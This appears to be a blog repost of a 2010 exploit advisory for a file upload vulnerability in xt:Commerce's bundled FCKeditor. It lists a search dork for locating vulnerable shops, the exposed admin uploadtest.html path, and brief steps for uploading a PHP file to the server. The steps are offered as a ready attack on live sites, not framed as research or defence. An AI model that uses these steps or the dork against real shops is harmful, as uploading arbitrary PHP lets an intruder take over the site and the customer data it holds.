Sabtu, 17 Maret 2018

xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability

FCKeditor
xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability

Exploit Title: xt:Commerce Shopsoftware (fckeditor)
# Date: 08/11/2010
# Author: Net.Edit0r
# Software Link: www.xt-commerce.com/
# Version: 3 & 4
# Tested on: Linux Ubuntu 9.04
# dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################

    exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

first go to # http://site.com/[shop]

       then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

     select # Select the "File Uploader"> php ... upload to : Uploaded
File URL:

Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

# Please comment, question and criticize politely
# Here you can insert Links in the comments field
# But will I moderate or review each comment first
# Do not let your comment contain SPAM.
# Thank You - Regards Muhammad Sobri Maulana
EmoticonEmoticon